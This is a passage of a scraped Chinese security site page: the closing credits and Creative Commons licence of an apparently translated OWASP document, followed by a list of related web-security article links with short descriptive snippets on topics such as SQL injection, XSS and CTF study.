margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> Adam Lange</p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> Mishra Dhiraj</p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> <span style="">版权与许可</span></h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 版权所有:OWASP基金会©</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> 本文档基于 Creative Commons Attribution ShareAlike3.0 license 发布。任何重用或发行,都必须向他人明确该文档的许可条款。 http://creativecommons.org/licenses/by-sa/3.0/</p> </blockquote> <span style="font-weight:700; font-family:微软雅黑; font-size:15px; color:rgb(159,163,168)">walletong@ansion编译,转载请注明FreeBuf.COM</span> <br> </div> </div> </div> </div> </div> <!--PC和WAP自适应版--> <div id="SOHUCS" sid="1288810932759240704"></div> <script type="text/javascript" src="/views/front/js/chanyan.js"></script> <!-- 文章页-底部 动态广告位 --> <div class="youdao-fixed-ad" id="detail_ad_bottom"></div> </div> <div class="col-md-3"> <div class="row" id="ad"> <!-- 文章页-右侧1 动态广告位 --> <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_1"> </div> </div> <!-- 文章页-右侧2 动态广告位 --> <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_2"></div> </div> <!-- 文章页-右侧3 动态广告位 --> <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_3"></div> </div> </div> </div> </div> </div> </div> <div class="container"> <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(Web安全)</h4> <div id="paradigm-article-related"> <div class="recommend-post mb30"> <ul class="widget-links"> <li><a href="/article/1835327218037911552.htm" title="Web安全:Web体系架构存在的安全问题和解决方室" target="_blank">Web安全:Web体系架构存在的安全问题和解决方室</a> <span class="text-muted">程序员-张师傅</span> <a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a> <div>Web体系架构在提供丰富功能和高效服务的同时,也面临着诸多安全问题。这些问题可能涉及数据泄露、服务中断、系统被控制等多个方面,对企业和个人造成不可估量的损失。以下是对Web体系架构中存在的安全问题及解决方案的详细分析:Web体系架构存在的安全问题注入攻击SQL注入:攻击者通过在输入字段中插入恶意SQL代码,操控后台数据库,窃取、篡改或删除数据。OS命令注入:攻击者通过输入字段插入恶意代码,执行系统</div> </li> <li><a href="/article/1834896977599492096.htm" title="CTF——web方向学习攻略" target="_blank">CTF——web方向学习攻略</a> <span class="text-muted">一则孤庸</span> <a class="tag" taget="_blank" href="/search/CTF/1.htm">CTF</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/CTF/1.htm">CTF</a> <div>1计算机基础操作系统:熟悉Linux命令,方便使用Kali。网络技术:HCNA、CCNA。编程能力:拔高项,有更好。2web应用HTTP协议:必须掌握web开发框架web安全测试3数据库数据库基本操作SQL语句数据库优化4刷题</div> </li> <li><a href="/article/1834734741333569536.htm" title="学习笔记:FW内容安全概述" target="_blank">学习笔记:FW内容安全概述</a> <span class="text-muted">TKE_yinian</span> <div>内容安全概述信息安全概述主要威胁关于防护简介内容安全威胁应用层威胁内容安全技术WEB安全应用安全入侵防御检测邮件安全数据安全网络安全反病毒全局环境感知沙箱检测信息安全概述•信息安全是对信息和信息系统进行保护,防止未授权的访问、使用、泄露、中断、修改、破坏并以此提供保密性、完整性和可用性。•为关键资产提供机密性、完整性和可用性(CIA三元组)保护是信息安全的核心目标。CIA(Confidential</div> </li> <li><a href="/article/1834521213418958848.htm" title="网络安全(黑客)自学" target="_blank">网络安全(黑客)自学</a> <span class="text-muted">白帽子凯哥</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a> <div>一、什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、怎样规划网络安全如果你是一</div> </li> <li><a href="/article/1833833620888973312.htm" title="58手势验证码的分析" target="_blank">58手势验证码的分析</a> <span class="text-muted">allgiveup</span> <div>做爬虫的小伙伴们肯定都深有体会,爬虫要是遇到验证码了基本上就是GG了。于是爬虫工作者和验证码之间必有一战。随着web安全技术的提升,验证码也一代一代的革新,并且越发的变态。小曾也去研究了各式样的验证码,最后决定拿出58手势验证码和大家分享。分析概述首先我对58手势验证码做一个总体的描述。从触发验证码到验证成功,我们操作的背后需要向服务器发送6个请求,并且还有一次js算法对参数加密。6个请求之间有着</div> </li> <li><a href="/article/1833758551831572480.htm" title="web安全学习笔记(1)" target="_blank">web安全学习笔记(1)</a> <span class="text-muted">头发的天敌是代码</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/1.htm">web安全学习笔记</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a> <div>一、网络安全分支1.web安全——网站2.二进制安全物联网安全工控安全二、网站是如何搭建起来的1.服务器服务器与我们的家庭使用电脑有什么区别?①没有显卡②CPU+内存不同于家庭电脑2.操作系统家庭系统:WindowsXPWindows7Windows8Windows9Windows10Windows11服务器操作系统:Windows2000Windows2003Windows2008Windows</div> </li> <li><a href="/article/1833756279013732352.htm" title="Web安全与网络安全:SQL漏洞注入" target="_blank">Web安全与网络安全:SQL漏洞注入</a> <span class="text-muted">hong161688</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a> <div>Web安全与网络安全:SQL漏洞注入引言在Web安全领域,SQL注入漏洞(SQLInjectionVulnerability)是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段,从而操纵后台数据库系统,执行未授权的数据库查询,甚至可能获取数据库管理权限,进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行</div> </li> <li><a href="/article/1833727152600739840.htm" title="Web安全与网络安全:SQL漏洞注入" target="_blank">Web安全与网络安全:SQL漏洞注入</a> <span class="text-muted">bigbig猩猩</span> <a class="tag" taget="_blank" href="/search/typescript/1.htm">typescript</a><a class="tag" taget="_blank" href="/search/vue.js/1.htm">vue.js</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a> <div>Web安全与网络安全:SQL漏洞注入引言在Web安全领域,SQL注入漏洞(SQLInjectionVulnerability)是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段,从而操纵后台数据库系统,执行未授权的数据库查询,甚至可能获取数据库管理权限,进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行</div> </li> <li><a href="/article/1833677479475245056.htm" title="Web安全之SQL注入:如何预防及解决" target="_blank">Web安全之SQL注入:如何预防及解决</a> <span class="text-muted">J老熊</span> <a class="tag" taget="_blank" href="/search/Java/1.htm">Java</a><a class="tag" taget="_blank" href="/search/Web%E5%AE%89%E5%85%A8/1.htm">Web安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/%E7%B3%BB%E7%BB%9F%E6%9E%B6%E6%9E%84/1.htm">系统架构</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95/1.htm">面试</a> <div>SQL注入(SQLInjection)是最常见的Web应用漏洞之一,它允许攻击者通过注入恶意SQL代码来操作数据库,获取、修改或删除数据。作为Java开发者,理解并防止SQL注入攻击是至关重要的。在本篇文章中,我们将详细介绍SQL注入的原理,演示如何在电商交易系统中出现SQL注入漏洞,并提供正确的防范措施和解决方案。1.什么是SQL注入?SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式</div> </li> <li><a href="/article/1833514971900768256.htm" title="Java Web安全与Spring Config对象实战" target="_blank">Java Web安全与Spring Config对象实战</a> <span class="text-muted">福建低调</span> <div>本文还有配套的精品资源,点击获取简介:本课程深入探讨JavaWeb开发中的安全实践,包括认证与授权、输入验证、CSRF和XSS防护以及SQL注入防御等关键安全措施。同时,介绍SpringSecurity框架的应用,以及Config对象在Spring配置管理中的作用,包括依赖注入和外部化配置。课程还包括实战演练,通过设置安全环境和安全漏洞模拟,帮助开发者提升应用的安全性和故障排查能力。1.Web安全</div> </li> <li><a href="/article/1833496692800974848.htm" title="自学黑客(网络安全)" target="_blank">自学黑客(网络安全)</a> <span class="text-muted">白袍无涯</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8/1.htm">系统安全</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a><a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/1.htm">计算机网络</a> <div>前言:想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟</div> </li> <li><a href="/article/1833466437298122752.htm" title="Web安全之CSRF攻击详解与防护" target="_blank">Web安全之CSRF攻击详解与防护</a> <span class="text-muted">J老熊</span> <a class="tag" taget="_blank" href="/search/Java/1.htm">Java</a><a class="tag" taget="_blank" href="/search/Web%E5%AE%89%E5%85%A8/1.htm">Web安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/csrf/1.htm">csrf</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95/1.htm">面试</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a> <div>在互联网应用中,安全性问题是开发者必须时刻关注的核心内容之一。跨站请求伪造(Cross-SiteRequestForgery,CSRF),是一种常见的Web安全漏洞。通过CSRF攻击,黑客可以冒用受害者的身份,发送恶意请求,执行诸如转账、订单提交等操作,导致严重的安全后果。本文将详细讲解CSRF攻击的原理及其防御方法,结合电商交易系统的场景给出错误和正确的示范代码,并分析常见的安全问题与解决方案,</div> </li> <li><a href="/article/1832223846455930880.htm" title="网络安全(黑客)自学" target="_blank">网络安全(黑客)自学</a> <span class="text-muted">白帽子凯哥</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a> <div>一、什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、怎样规划网络安全如果你是一</div> </li> <li><a href="/article/1832162319967285248.htm" title="自学黑客(网络安全)" target="_blank">自学黑客(网络安全)</a> <span class="text-muted">L世界凌乱了</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a> <div>前言:想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟</div> </li> <li><a href="/article/1832003242897272832.htm" title="SecurityHeaders:为.Net网站添加安全标头,让Web更加安全、避免攻击!" target="_blank">SecurityHeaders:为.Net网站添加安全标头,让Web更加安全、避免攻击!</a> <span class="text-muted">编程乐趣</span> <a class="tag" taget="_blank" href="/search/.net/1.htm">.net</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a> <div>网站的安全对于任何一家公司都是非常重要的。为了保证Web安全,其中Http安全标头就是非常重要一个的措施。设定正确的安全头可以增强网站的安全性,因为它们可以帮助防止各种网络攻击,如跨站脚本(XSS)、点击劫持(Clickjacking)和内容类型嗅探(ContentTypeSniffing)等。下面推荐一个开源项目,可以让我们轻松地添加安全相关的HTTP头到网站中。01项目简介NetEscapad</div> </li> <li><a href="/article/1831752505365721088.htm" title="Web安全和渗透测试有什么关系?" target="_blank">Web安全和渗透测试有什么关系?</a> <span class="text-muted">程序员_大白</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......总之,web安全包含于渗透测试,但不是渗透测试的全部。`黑客&网络安全如何学习今天只要你给我的文章点赞,我私藏的网</div> </li> <li><a href="/article/1831631344136974336.htm" title="网络安全(黑客)自学" target="_blank">网络安全(黑客)自学</a> <span class="text-muted">白帽子凯哥</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a> <div>一、什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、怎样规划网络安全如果你是一</div> </li> <li><a href="/article/1831501123245142016.htm" title="零基础能学网络安全吗?" target="_blank">零基础能学网络安全吗?</a> <span class="text-muted">leah126</span> <a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E5%91%98/1.htm">程序员</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">渗透测试</a><a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A8%8B/1.htm">编程</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a> <div>当然可以。但网络安全有很多方向,如果你想转行网络安全技术方向,建议先着手学web安全方向。因为,web安全相对于整个网络安全行业来说难度是相对比较低的,学起来更加容易入手。虽然渗透测试工程师、溯源取证、红蓝攻防等等这些岗位看起来很不错,但是技术门槛特别高,对于0基础的人来说学起来会相当吃力。所以,web安全方向对于初学者来说是最好入门选择。那么该如何学习呢?1.买一本《白帽子讲web安全》,先了解</div> </li> <li><a href="/article/1831447681080324096.htm" title="【网络安全面经】渗透面经、安服面经、红队面经、hw面经应有尽有 这一篇真的够了" target="_blank">【网络安全面经】渗透面经、安服面经、红队面经、hw面经应有尽有 这一篇真的够了</a> <span class="text-muted">webfker from 0 to 1</span> <a class="tag" taget="_blank" href="/search/github/1.htm">github</a><a class="tag" taget="_blank" href="/search/git/1.htm">git</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>目录面经牛客奇安信面经(五星推荐)牛客面经(推荐)渗透测试面经(推荐)渗透测试技巧计网面经SQL注入漏洞注入绕过XXE漏洞最强面经Github面经模拟面WEB安全PHP安全网络安全密码学一、青藤二、360三、漏洞盒子四、未知厂商五、长亭-红队六、qax七、天融信八、安恒九、长亭十、国誉网安十一、360-红队十二、天融信十三、长亭-2十四、360-2十五、极盾科技十六、阿里十七、长亭3十八、qax-</div> </li> <li><a href="/article/1831347352305233920.htm" title="CORS是什么,功能如何实现" target="_blank">CORS是什么,功能如何实现</a> <span class="text-muted">茶卡盐佑星_</span> <a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a><a class="tag" taget="_blank" href="/search/es6/1.htm">es6</a> <div>CORS,全称为“跨域资源共享”(Cross-OriginResourceSharing),是一种浏览器技术的规范,允许浏览器向跨源服务器发出XMLHttpRequest请求,从而克服了AJAX只能同源使用的限制。CORS是Web安全领域的一个重要概念,旨在确保浏览器端与服务器端之间安全地进行跨域通信。CORS的功能CORS的主要功能是:安全跨域通信:允许前端页面从与其不同源的服务器请求资源,如A</div> </li> <li><a href="/article/1831251942815395840.htm" title="网站安全检测:推荐 8 款免费的 Web 安全测试工具" target="_blank">网站安全检测:推荐 8 款免费的 Web 安全测试工具</a> <span class="text-muted">白帽黑客2659</span> <a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E6%B5%8B%E8%AF%95%E5%B7%A5%E5%85%B7/1.htm">测试工具</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a><a class="tag" taget="_blank" href="/search/ddos/1.htm">ddos</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a> <div>目录1.OWASPZAP(ZedAttackProxy)2.BurpSuiteFreeEdition3.Nikto4.w3af5.SQLMap6.Arachni7.XSSer8.SecurityHeaders.io使用这些工具的建议网站安全是确保数据保护和系统完整性的重要组成部分。对于希望增强网站安全性的开发者和管理员来说,利用有效的工具进行定期的安全测试是必不可少的。以下是8款免费的Web安全测</div> </li> <li><a href="/article/1831137725458247680.htm" title="网络安全笔记-信息安全工程师与网络安全工程师考试大纲(附:Web安全大纲)_信息网络安全师认证(inspc)培训工作大纲" target="_blank">网络安全笔记-信息安全工程师与网络安全工程师考试大纲(附:Web安全大纲)_信息网络安全师认证(inspc)培训工作大纲</a> <span class="text-muted">程序员安安</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">服务器</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>Web安全大纲2024信息安全工程师考试大纲1、考试目标通过本考试的合格人员能够掌握网络信息安全的基础知识和技术原理;根据国家网络信息安全相关法律法规及业务安全保障要求,能够规划、设计信息系统安全方案,能够配置和维护常见的网络安全设备及系统;能够对信息系统的网络安全风险进行监测和分析,并给出网络安全风险问题的整改建议;能够协助相关部门对单位的信息系统进行网络安全审计和网络安全事件调查;能够对网络信</div> </li> <li><a href="/article/1831049730419945472.htm" title="javaWeb安全漏洞修复总结" target="_blank">javaWeb安全漏洞修复总结</a> <span class="text-muted">dechen6073</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a> <div>1Web安全介绍12SQL注入、盲注12.1SQL注入、盲注概述12.2安全风险及原因22.3AppScan扫描建议22.4应用程序解决方案43会话标识未更新73.1会话标识未更新概述73.2安全风险及原因分析73.3AppScan扫描建议83.4应用程序解决方案84已解密登录请求84.1已解密登录请求概述84.2安全风险及原因分析84.3AppScan扫描建议94.4应用程序解决方案95跨站点请</div> </li> <li><a href="/article/1830726423149637632.htm" title="Web安全之XSS跨站脚本攻击" target="_blank">Web安全之XSS跨站脚本攻击</a> <span class="text-muted">Shadow_143</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">渗透测试</a> <div>1.XSS漏洞简介XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至是普通的HTML。攻击成功后,攻击者可能得到更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。2.XSS</div> </li> <li><a href="/article/1829831756220559360.htm" title="小白如何快速入门网络安全里,主要岗位有哪些?" target="_blank">小白如何快速入门网络安全里,主要岗位有哪些?</a> <span class="text-muted">baimao__沧海</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/tcpdump/1.htm">tcpdump</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>入门Web安全、安卓安全、二进制安全、工控安全还是智能硬件安全等等,每个不同的领域要掌握的技能也不同。当然入门Web安全相对难度较低,也是很多人的首选。主要还是看自己的兴趣方向吧。本文就以下几个问题来说明网络安全大致学习过程网络安全主要岗位有哪些安全领域技术方向分类渗透测试学习路线小白如何快速入门一、网络安全里的主要的岗位有哪些:渗透测试工程师:主要是模拟黑客对目标业务系统进行攻击,点到为止安全运</div> </li> <li><a href="/article/1829795955885568000.htm" title="web安全基础名词概念" target="_blank">web安全基础名词概念</a> <span class="text-muted">pink鱼</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>本节内容根据小迪安全讲解制作第一天域名:1.1什么是域名?网域名称(英语:DomainName,简称:Domain),简称域名、网域,是由一串用点分隔的字符组成的互联网上某一台计算机或计算机组的名称,用于在数据传输时标识计算机的电子方位。1.2什么是二级域名,多级域名?二级域名,通常指的是在顶级域名下面再划分的一个域名层次。它的形式通常是“子域名.顶级域名”。比如,在域名“www.example.</div> </li> <li><a href="/article/1828834836698198016.htm" title="【web安全】从2022中科大hackgame web中学习pdflatex RCE和python反序列化" target="_blank">【web安全】从2022中科大hackgame web中学习pdflatex RCE和python反序列化</a> <span class="text-muted">热心网友易小姐</span> <a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a> <div>ctf比赛地址:https://hack.lug.ustc.edu.cn大佬博客里wp写的很清楚了,官方wp也写的很好,我比不过大佬,只能把基础多讲一些(大佬在tttang把wp全发了T0T)官方wp:https://github.com/USTC-Hackergame/hackergame2022-writeups大佬全WP:https://miaotony.xyz/?utm_source=tt</div> </li> <li><a href="/article/1828734858881495040.htm" title="网络安全工程师的学习路线" target="_blank">网络安全工程师的学习路线</a> <span class="text-muted">程序员鬼鬼</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" 